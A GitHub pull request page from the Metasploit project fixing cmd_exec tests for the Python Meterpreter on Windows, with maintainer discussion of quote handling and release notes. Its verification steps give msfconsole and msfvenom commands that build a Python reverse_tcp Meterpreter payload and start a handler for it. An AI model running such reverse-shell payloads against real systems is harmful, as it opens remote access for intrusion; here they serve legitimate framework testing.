Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

fix cmd_exec tests on python/windows #11938

Merged
merged 1 commit into from Jun 4, 2019

Conversation

Projects
None yet
3 participants
@timwr
Copy link
Contributor

commented Jun 2, 2019

This change works around #11935
Alternatively we could skip the test.

Verification

List the steps needed to make sure this thing works

  • msfconsole -qx "use exploit/multi/handler; set payload python/meterpreter/reverse_tcp; set lhost $LHOST; set lport 4444; set PythonMeterpreterDebug true; set ExitOnSession false; run -j"
  • msfvenom -p python/meterpreter/reverse_tcp LHOST=$LHOST LPORT=4444 -o "$1"
  • Run the python payload on Windows
  • Run the tests:
loadpath test/modules
use post/test/cmd_exec
set SESSION -1
exploit
  • Verify the tests pass
@bwatters-r7

This comment has been minimized.

Copy link
Contributor

commented Jun 3, 2019

I'm waffling on this. On one hand, this means we deal with arg strings on exe and java meterpreters differently than python. That feels wrong, but it is reality. We use CreateProcess and pass the args through on exe windows meterpreter and subprocess.Popen to do it on python.

I'm thinking what you did here is the best option, as trying to fix it might not be a great idea.
I do think we will find that we will have to also add a new entry for 'nix and python, though.

@timwr

This comment has been minimized.

Copy link
Contributor Author

commented Jun 4, 2019

I'm still keen to actually fix this for consistency but let's land this and get the tests passing first. We can then remove this hack while landing the actual fix (and add more to cover potential breakage).

@bwatters-r7 bwatters-r7 merged commit cd460aa into rapid7:master Jun 4, 2019

3 checks passed

Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Details
Metasploit Automation - Test Execution Successfully completed all tests.
Details
continuous-integration/travis-ci/pr The Travis CI build passed
Details

bwatters-r7 added a commit that referenced this pull request Jun 4, 2019

Land #11938, fix cmd_exec tests on python/windows
Merge branch 'land-11938' into upstream-master
@bwatters-r7

This comment has been minimized.

Copy link
Contributor

commented Jun 4, 2019

Release Notes

This is a temporary bug fix for how we interpret quotes in Meterpreter commands. Currently, Python on Windows handles quotation marks differently than exe or Java Meterpreter handles them. This fix adapts the test to verify that they work, but not that they are treated equally.

msjenkins-r7 added a commit that referenced this pull request Jun 4, 2019

Land #11938, fix cmd_exec tests on python/windows
Merge branch 'land-11938' into upstream-master

@tdoan-r7 tdoan-r7 added the rn-fix label Jun 11, 2019

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.